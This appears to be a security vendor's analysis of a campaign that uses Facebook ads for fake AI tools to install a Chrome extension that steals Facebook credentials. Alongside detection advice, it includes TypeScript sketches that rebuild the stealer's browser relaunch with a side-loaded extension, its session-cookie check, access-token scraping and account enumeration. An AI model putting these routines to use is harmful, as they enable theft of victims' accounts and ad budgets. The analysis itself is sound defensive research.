Large language models (LLMs) are drawing enormous attention as the emergence of general artificial intelligence appears to draw nearer. Early adopters stand to gain a strong competitive advantage, particularly in creative fields such as marketing and copywriting, as well as in data analysis and processing. However, the growing adoption of AI technologies also opens opportunities for cybercriminals who want to capitalize on the interest in LLMs.
In this blog entry, we discuss how a threat actor abuses paid Facebook promotions featuring LLMs to spread malicious code, with the goal of installing a malicious browser add-on and stealing victims’ credentials. The threat actor uses URL shorteners like rebrand.ly for redirection, Google Sites for web hosting, and cloud storage services like Google Drive and Dropbox to host the malicious files.
We shared our findings with Meta, which tracked this particular threat actor and its tactics, techniques, and procedures (TTPs) and has since removed the fraudulent pages and ads we reported. Meta has shared that it will continue to strengthen its detection systems against similar fraudulent ads and pages using insights from both internal and external threat research. Additionally, Meta recently shared updates about its efforts to protect businesses that malware might target across the internet and recommended tips to help users stay safe.
Infection vector
The threat actor uses Facebook’s paid promotions to lure potential victims with advertisements that feature fake profiles of marketing companies or departments. Telltale signs of these fake profiles include purchased or bot followers, fake reviews left by other hijacked or inauthentic profiles, and a limited online history.
These advertisements promise to boost productivity, increase reach and revenue, or assist in teaching, all with the help of AI. Some lures promise to provide access to Google Bard (Figures 1 and 2), a conversational AI chatbot that is unavailable in the European Union (EU) at the time of writing.
In other cases, the threat actor claims to provide access to “Meta AI,” as shown in Figure 4.
Once the user clicks the link in the advertisement, they are redirected to a simple website that lists the advantages of using LLMs. The site also contains a link for downloading the actual "AI package," as shown in Figure 5.
To avoid antivirus detection, the threat actor distributes the package as an encrypted archive with simple passwords like "999" or "888". The archive is usually hosted on cloud storage sites like Google Drive or Dropbox.
Analysis of the package
The archive, once opened and decrypted with the correct password, usually contains a single MSI installer file. When the victim executes the installer, the installation process (Figure 6) drops a few files belonging to a Chrome extension, including background.js, content.js, favicon.png, and manifest.json (Figure 7). It then runs a batch script that kills the currently running browser and restarts it, this time with a malicious extension loaded that impersonates Google Translate (Figures 8 and 9).
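We do not reproduce the batch script here, but the relaunch trick it relies on is common in similar campaigns: terminate the browser, then start it again with the dropped, unpacked extension side-loaded through Chrome’s --load-extension switch. The following TypeScript (Node) sketch is only a conceptual illustration under that assumption, with a hypothetical drop path:

```typescript
// Conceptual sketch only: terminate the browser, then relaunch it with the dropped,
// unpacked extension side-loaded. The actor uses a batch script; the path is hypothetical.
import { execSync, spawn } from "child_process";

const extensionDir = "C:\\Users\\victim\\AppData\\Local\\TranslateExt"; // hypothetical drop location

try {
  // Kill running Chrome instances so the relaunch flags take effect.
  execSync("taskkill /F /IM chrome.exe", { stdio: "ignore" });
} catch {
  // Chrome was not running; nothing to kill.
}

// Relaunch Chrome with the unpacked extension side-loaded via --load-extension.
// Detection tip: browser processes whose command line contains "--load-extension="
// pointing at a user-writable directory are worth investigating.
spawn("chrome.exe", [`--load-extension=${extensionDir}`], {
  detached: true,
  stdio: "ignore",
});
```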
Analysis of the malicious extension
The main logic of the malicious extension can be found in its service worker script. After deobfuscation, we can analyze its stealing capabilities. First, the script attempts to steal Facebook cookies. It specifically checks for the presence of the c_user cookie, which stores a unique user ID (Figure 10). If the c_user cookie does not exist, the stealer does not continue.
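As a minimal sketch of this gate (the real script is obfuscated, so the structure and names below are ours), the check maps onto the chrome.cookies API available to extensions with the cookies permission:

```typescript
// Simplified sketch of the cookie gate (extension service worker context).
// The real script is obfuscated; variable names here are ours.
chrome.cookies.getAll({ domain: "facebook.com" }, (cookies) => {
  const cUser = cookies.find((c) => c.name === "c_user");
  if (!cUser) {
    return; // no logged-in Facebook session: the stealer stops here
  }
  // c_user holds the numeric Facebook user ID; the session cookies are collected
  // alongside it for later exfiltration.
  const victimId = cUser.value;
  // ... token theft and GraphQL enumeration follow (described below)
});
```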
It then proceeds to steal the access token and use it to request additional information from Facebook’s GraphQL API (Figure 11).
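We are not reproducing the sample’s token-theft routine here; as a general illustration, similar Facebook stealer families scrape a Graph API token (which typically begins with "EAA") out of a page fetched with the victim’s session cookies. The endpoint and regular expression in the sketch below are assumptions and may not match this sample:

```typescript
// Illustrative only: similar stealer families scrape a Graph API token (typically
// starting with "EAA") from a page fetched with the victim's session cookies.
// The endpoint and regex below are assumptions, not taken from this sample.
async function findAccessToken(): Promise<string | null> {
  const resp = await fetch("https://business.facebook.com/business_locations", {
    credentials: "include", // reuse the victim's authenticated session
  });
  const html = await resp.text();
  const match = html.match(/EAA[A-Za-z0-9]+/);
  return match ? match[0] : null;
}
```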
Having stolen the access token, the script can query Facebook’s GraphQL API for additional information. The first GraphQL query enumerates the account’s managed pages and information about them, like each page’s business ID, fan count, the tasks the account can perform on it (analyze, advertise, messaging, moderate, create content, and manage), and its verification status.
The second GraphQL query enumerates the account’s business information, like its ID, verification status, the ability to create ad accounts, sharing eligibility status, and the account creation time.
The last GraphQL query enumerates the account’s advertisement information, like its ID, account status (whether it’s “live”, “disabled”, “unsettled”, “in grace period”, or “closed”), currency, whether it’s prepaid, its ads payment cycle, daily spending limit, amount already spent, account balance, and the account creation time.
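The actor sends these queries to Facebook’s internal GraphQL endpoint, which we do not reproduce. As a rough approximation of what a stolen token exposes, much of the same information can be pulled through the public Graph API; the field names below are our assumptions rather than the actor’s exact queries:

```typescript
// Rough approximation using the public Graph API; the actor queries Facebook's
// internal GraphQL endpoint instead. Field names are illustrative assumptions.
const GRAPH = "https://graph.facebook.com/v17.0";

async function enumerateAccount(token: string) {
  // Managed pages: IDs, fan counts, permitted tasks, and so on.
  const pages = await fetch(
    `${GRAPH}/me/accounts?fields=id,name,fan_count,tasks&access_token=${token}`
  ).then((r) => r.json());

  // Ad accounts: status, currency, spend limit, amount spent, balance, creation time.
  const adAccounts = await fetch(
    `${GRAPH}/me/adaccounts?fields=id,account_status,currency,spend_cap,amount_spent,balance,created_time&access_token=${token}`
  ).then((r) => r.json());

  return { pages, adAccounts };
}
```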
The stealer also attempts to get the victim’s IP address. All the stolen information (the aforementioned Facebook cookies, access token, browser user agent, managed pages, business account information, and advertisement account information) is concatenated, URL-encoded, base64-encoded, and exfiltrated to a command-and-control (C&C) server (Figure 12).
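Because the encoding chain is just URL encoding followed by base64 encoding, a captured exfiltration payload can be recovered by reversing it during incident response. A minimal sketch, with a made-up payload format since we are not reproducing the actual field layout:

```typescript
// The exfiltrated blob is URL-encoded and then base64-encoded, so a captured
// POST body can be recovered by reversing the chain.
// The sample payload format below is made up for illustration.
function decodeExfilPayload(blob: string): string {
  const urlEncoded = Buffer.from(blob, "base64").toString("utf8");
  return decodeURIComponent(urlEncoded);
}

// Round trip: encode the way the stealer does, then decode it back.
const fake = "c_user=100000000000001|token=EAA...|ua=Mozilla/5.0";
const encoded = Buffer.from(encodeURIComponent(fake), "utf8").toString("base64");
console.log(decodeExfilPayload(encoded) === fake); // true
```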
We noticed a short string being appended to the nave variable, which contains the web browser’s user agent string. This string differs between samples; we posit that it is some kind of campaign ID that helps the threat actor identify how a particular victim was infected. The campaign ID usually starts with an asterisk (*) and ends with a pipe symbol (|), as shown in Figure 13; a simple pattern for extracting these markers is sketched after the list below.
During this research, we observed the following campaign IDs:
- *fb|
- *gs2|
- *gs4|
- *gv4|
- *s2|
- *ss8|
- *tu1|
- *v8|
- *v9|
- *voi2|
- *voi4|
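For hunting and sample clustering, markers of this shape are easy to pull out of deobfuscated scripts. A minimal sketch, with a pattern of our own that may need tuning for other samples:

```typescript
// Helper for pulling campaign-ID-like markers (asterisk-prefixed, pipe-terminated,
// as in the list above) out of a deobfuscated script. The pattern is ours and may
// need tuning for other samples.
import { readFileSync } from "fs";

function extractCampaignIds(scriptPath: string): string[] {
  const script = readFileSync(scriptPath, "utf8");
  return script.match(/\*[a-z0-9]{1,8}\|/gi) ?? [];
}

// Example: extractCampaignIds("deobfuscated_background.js") might return ["*gs2|"]
```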
Threat actor background
Within the malicious script, we noticed several keywords and variables in Vietnamese (Figures 14 and 15), suggesting that the threat actor speaks or at least understands Vietnamese.
Conclusion and Security Recommendations
Our research suggests that the threat actor’s main goal is to target and infect the managers or administrators of business social networking accounts and marketing specialists (who are often also administrators of a company’s social networking sites). As supporting evidence, we observed that the same tracker ID reappears on multiple websites with domain names that contain strings like “gooogle-bard”, “gbard”, and “adds-manager-meta”.
In one case, one of the authors of this research helped with the incident response for a specific victim and observed that the threat actor had added suspicious users to the victim’s Meta Business Manager. The threat actor also used the victim’s prepaid promotion budget to promote its own content. To date, the threat actor has not tried to contact this victim. According to Facebook’s research, malware operators and threat actors have historically been motivated primarily by account theft as opposed to extortion.
An antivirus solution with web reputation services is a good countermeasure to threats like the one described in this blog entry. Users should always scan the files they download from the internet and stay vigilant against threat actors who might abuse the hype surrounding new developments in artificial intelligence. The best protection against this kind of attack is always awareness, so potential targets of this threat actor should be wary of the following red flags:
- A flashy, “hot shot” look and feel on the landing site that hosts the link to the malicious file
- Promise of access to Google Bard even though its availability is limited in certain countries
- The offered service appearing too good to be true, as official access to LLMs and systems based on them is expensive and/or limited
- Any inconsistency in the wording and appearance of promotional posts by the threat actor
- A broadly available yet password-protected file offered on the landing site
Indicators of Compromise (IOCs)
The IOCs for this article can be found here.